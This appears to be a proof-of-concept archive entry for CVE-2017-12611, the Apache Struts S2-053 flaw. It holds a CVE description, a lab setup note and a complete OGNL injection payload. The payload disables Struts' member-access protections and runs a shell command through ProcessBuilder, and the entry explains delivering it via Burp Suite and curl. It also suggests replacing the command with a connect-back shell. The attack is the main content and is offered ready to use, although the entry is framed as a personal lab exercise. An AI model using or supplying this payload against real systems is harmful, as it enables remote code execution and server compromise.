Related vulnerability
Title:
Apache Struts input validation error vulnerability
(CVE-2017-12611)
Description: Apache Struts is an open-source project of the Apache Software Foundation, an MVC framework for building enterprise Java web applications, shipped in two main product lines, Struts 1 and Struts 2. Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10 contain an input validation error vulnerability (Struts advisory S2-053: attacker-controlled input reaches a Freemarker tag attribute where it is evaluated as an OGNL expression instead of being treated as a string literal). A remote attacker can exploit it to execute arbitrary code.
Description
RCE project
Introduction
# CVE-2017-12611 Project
## Overview:
An RCE attack is possible with the payload given below.
## Environment & Tools
The following lists the environments and tools for testing and validation in an isolated, personal lab.
- **Host OS**: Ubuntu 18.04.6
- **Attacker OS**: Kali Linux
- **Container Platform**: Docker
- **Target Application Stack**: Apache Struts 2.3.20.1
- **Additional Components**: Burp Suite
## Environment Setup:
Start the environment with:
```bash
docker compose up -d
```
Once it is up, the submission page is at [http://<YOUR_IP>:8080/hello.action](http://<YOUR_IP>:8080/hello.action). Note that the file snapshot of this POC contains only the README and screenshots, so the docker-compose.yml that this command expects is not included in it.
## Payload:
```
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
```
The write-up delivers the payload through Burp Suite: with Burp intercepting, submit the payload in the form on hello.action, locate the resulting POST request in the HTTP history, and use "Copy as curl command" to turn it into a curl command that can be replayed from the attacker machine. The payload as written runs `id` and returns the command's output as the value of the OGNL expression, which is rendered into the HTTP response (see the RCE_id.png, RCEuname-a.png and RCE_whoami.png screenshots), so no listener is needed for it. If you replace `#cmd` with a command that connects back to the attacker machine, start the listener on the attacker machine first and only then send the curl request.
### Notes:
Censored areas in the screenshots are IP addresses.
File snapshot
[4.0K] /data/pocs/b9b8f843be4d1067c4ca263d19c518e7f50c09f5
├── [105K] BurpSuite.png
├── [103K] Payload.png
├── [369K] RCE_id.png
├── [ 79K] RCEuname-a.png
├── [149K] RCE_whoami.png
└── [1.7K] README.md
0 directories, 6 files
Notes
1. Accessing the POC through its original source is recommended.
2. If the source is no longer available, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.